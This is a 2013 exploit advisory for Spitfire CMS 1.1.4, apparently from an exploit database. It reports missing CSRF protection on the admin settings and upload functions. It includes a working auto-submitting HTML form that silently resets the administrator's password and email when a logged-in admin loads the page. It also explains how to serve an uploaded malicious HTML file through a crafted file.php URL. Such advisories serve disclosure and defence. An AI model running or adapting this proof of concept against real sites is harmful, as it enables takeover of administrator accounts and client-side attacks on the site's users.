################################################################################################################################### # Exploit Title: spitefire CMS - CSRF / ADD / EDTI / UPLOAD FILE # Date: 2013 15 August # Exploit Author: Yashar shahinzadeh # Special thanks to Mormoroth # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir # Vendor Homepage: http://spitfire.clausmuus.de/ # Tested on: Linux & Windows, PHP 5.2.9 # Affected Version : 1.1.4 # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir } ################################################################################################################################### Summary: ======== 1. CSRF - Adding/Editing administrator account / UPLOAD FILE 1. CSRF - Adding/Editing administrator account: =============================================== Spitefire cms ain't a well-coded CMS having many errors and low performance... It is not protected from CSRF as attackers are capable of adding/editing administrators account, or ever uploading a file through CSRF. I'm only giving example of chaning administrator's details: <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://localhost/spitfire_site/cms/edit/tpl_user_settings_action.php" method="post"> <input type="hidden" name="value[password]" value="arian123"> <input type="hidden" name="value[password2]" value="arian123"> <input type="hidden" name="value[email]" value="y.shahinzadeh@gmail.com"> <input type="hidden" name="action" value="save"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> After issuing exploit, something like that may be appeared: status = {'values':{'id':'1','realname':'Administrator','username':'admin','password':'','groups':{'all':'7','1':'4'},'may_edit_users':'1','is_admin':'1','status':'0','is_ldap_user':'0','must_change_password':'','email':'admin@admin.net','language':'en'},'messages':{},'quickbar':{'disabledButtons':{'save':'1','redo':'1'}},'statusbar':{'value':' #1'}}; I would expand on upload procedure, at the beginning of the installing site, the author is forced to give a writable directory for saving files, finding the given directory aint much difficult (default is /site/files/). The upload form doesn't have CSRF token so attacker can upload malicious file containing HTML/JAVA codes. The file will be renamed to a file without any extention after uploading, so only client side exploits and attacks can be conducted. Since file_get_contents() function executes file, the attacker must give the crafted URL which is similar to following URL: http://localhost/spitfire_site/cms/file.php?cms_id=4&name=logo&type=text/html text/html is the dangerous part because it's set image/gif as default. /** Yasshar shahinzadeh **/Брой прочитания на тази страница: 960
Spitfire CMS 1.1.4 – CSRF Vulnerability